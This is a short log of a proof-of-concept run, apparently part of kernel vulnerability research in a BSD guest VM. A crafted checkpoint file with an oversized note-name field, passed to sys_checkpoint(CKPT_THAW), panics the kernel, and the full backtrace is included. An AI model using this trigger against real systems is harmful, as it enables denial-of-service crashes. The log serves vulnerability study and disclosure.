DF-0070 / run.2.log
=== DF-0070 run.2.log (panic mode, RUN 1 -- first observation, pre-reset) ===
Guest: same kernel, same snapshot.
Caller: root.
Command:
cd /tmp/df70 && /bin/sh -c "(./df0070 evil.ckpt) 2>&1; echo RUN_EXIT=$?"
$ ./df0070 evil.ckpt
[*] DF-0070 PoC: building evil.ckpt (notesz=880, n_namesz=0x10000000, n_descsz=120, mode=panic)
[*] calling sys_checkpoint(CKPT_THAW, fd=3, pid=-1, retval=0) [syscall #467]...
<shell tool terminated command after exceeding timeout 120000 ms>
<ssh session gone: guest panicked>
Panic signature (RUN 1) from dfbsd-qemu/boot.log:
panic: assertion "obj != NULL" failed in vm_object_hold_shared at /usr/src/sys/vm/vm_object.c:330
cpuid = 0
Trace beginning at frame 0xfffff800ab88b338
vm_object_hold_shared() at vm_object_hold_shared+0x3f 0xffffffff809ab0cf
vm_object_hold_shared() at vm_object_hold_shared+0x3f 0xffffffff809ab0cf
vm_fault() at vm_fault+0x408 0xffffffff8099d7c8
trap_pfault() at trap_pfault+0x9a 0xffffffff80bd49da
trap() at trap+0x17c 0xffffffff80bd52dc
calltrap() at calltrap+0x9 0xffffffff80b9890a
--- trap 000000000000000c, rip = ffffffff80bca038, rsp = fffff800ab88b750, rbp = fffff800ab88b7b8 ---
memmove() at memmove+0x28 0xffffffff80bca038
Debugger("panic")
CPU0 stopping CPUs: 0x00000002
stopped
Stopped at Debugger+0x7c: movb $0,0xbd77f9(%rip)
db>
RUN 1 vs RUN 2 code offsets are byte-identical; only frame addresses differ
(KVM randomisation between boots).